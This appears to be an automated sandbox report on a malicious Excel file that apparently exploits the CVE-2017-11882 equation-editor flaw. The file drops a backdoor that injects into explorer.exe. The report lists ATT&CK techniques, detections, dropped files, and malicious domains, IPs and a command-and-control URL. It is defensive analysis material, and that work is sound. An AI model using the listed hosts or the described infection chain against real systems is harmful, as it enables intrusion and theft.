          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncSystem Information Discovery14Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 356571 Sample: QTN3C2AF414EDF9_041873.xlsx Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for dropped file 2->57 59 14 other signatures 2->59 10 EQNEDT32.EXE 13 2->10         started        15 EXCEL.EXE 37 19 2->15         started        process3 dnsIp4 49 algreenstdykeghestqw.dns.army 103.140.251.164, 49168, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->49 51 ow.ly 54.67.57.56, 49167, 80 AMAZON-02US United States 10->51 37 C:\Users\user\AppData\Local\...\winlog[1], PE32 10->37 dropped 39 C:\Users\Public\vbc.exe, PE32 10->39 dropped 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->79 17 vbc.exe 19 10->17         started        41 C:\Users\...\~$QTN3C2AF414EDF9_041873.xlsx, data 15->41 dropped file5 signatures6 process7 file8 33 C:\Users\user\AppData\Local\...\z9ayiyo.dll, PE32 17->33 dropped 35 C:\Users\user\AppData\Local\...\System.dll, PE32 17->35 dropped 61 Multi AV Scanner detection for dropped file 17->61 63 Detected unpacking (changes PE section rights) 17->63 65 Machine Learning detection for dropped file 17->65 67 2 other signatures 17->67 21 vbc.exe 17->21         started        signatures9 process10 signatures11 69 Modifies the context of a thread in another process (thread injection) 21->69 71 Maps a DLL or memory area into another process 21->71 73 Sample uses process hollowing technique 21->73 75 Queues an APC in another process (thread injection) 21->75 24 explorer.exe 21->24 injected process12 dnsIp13 43 athara-kiano.com 103.251.44.218, 49170, 80 IDNIC-JALANET-AS-IDPTJupiterJalaArtaID Indonesia 24->43 45 www.fashionwatchesstore.com 104.21.61.250, 49169, 80 CLOUDFLARENETUS United States 24->45 47 6 other IPs or domains 24->47 77 System process connects to network (likely due to code injection or exploit) 24->77 28 ipconfig.exe 24->28         started        signatures14 process15 signatures16 81 Modifies the context of a thread in another process (thread injection) 28->81 83 Maps a DLL or memory area into another process 28->83 85 Tries to detect virtualization through RDTSC time measurements 28->85 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QTN3C2AF414EDF9_041873.xlsx33%VirustotalBrowse
          QTN3C2AF414EDF9_041873.xlsx26%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]100%Joe Sandbox ML
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]36%ReversingLabsWin32.Backdoor.Androm
          C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll0%ReversingLabs
          C:\Users\Public\vbc.exe36%ReversingLabsWin32.Backdoor.Androm

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.vbc.exe.2900000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0g0%Avira URL Cloudsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ow.ly
          		54.67.57.56
          		truefalse
            		high
            algreenstdykeghestqw.dns.army
            		103.140.251.164
            		truefalse
              		unknown
              overseaexpert.com
              		191.96.163.202
              		truetrue
                		unknown
                athara-kiano.com
                		103.251.44.218
                		truetrue
                  		unknown
                  www.fashionwatchesstore.com
                  		104.21.61.250
                  		truetrue
                    		unknown
                    oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com
                    		52.57.196.177
                    		truefalse
                      		high
                      www.evoslancete.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.athara-kiano.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.oryanomer.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.overseaexpert.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.athara-kiano.com/nsag/?SFN=1e70w6qoH0iHBmxDX27vpOpA5lfYuhHzBJ3+ZXyYbvrIHeDq+MUfY30bwUf90UJ6GkTmZw==&cBb=LtD0gtrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://search.ebay.de/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://www.mtv.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.rambler.ru/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://buscar.ya.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://www.iis.fhg.de/audioPAvbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://asp.usatoday.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://rover.ebay.comexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://search.ebay.in/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://%s.comexplorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		low
                                                            http://msk.afisha.ru/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://search.rediff.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.ya.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://it.search.dada.net/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://search.naver.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.google.ru/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://search.hanafos.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://search.daum.net/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://buscar.ozu.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://search.about.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://www.ask.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.cjmall.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://search.centrum.cz/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://suche.t-online.de/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://www.google.it/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://search.auction.co.kr/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.ceneo.pl/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.amazon.de/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000002.2375810590.0000000000260000.00000004.00000020.sdmpfalse
                                                                                                        		high
                                                                                                        http://sads.myspace.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://search.sify.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://search.ebay.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://search.nifty.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.google.si/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.google.cz/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.soso.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.univision.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://search.ebay.it/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://busca.orange.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://www.target.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://buscador.terra.es/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://www.iask.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://www.tesco.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://search.interpark.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://investor.msn.com/explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://search.espn.go.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.myspace.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://search.centrum.cz/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://p.zhongsou.com/favicon.icoexplorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://service2.bfast.com/explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.%s.comPAvbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpfalse
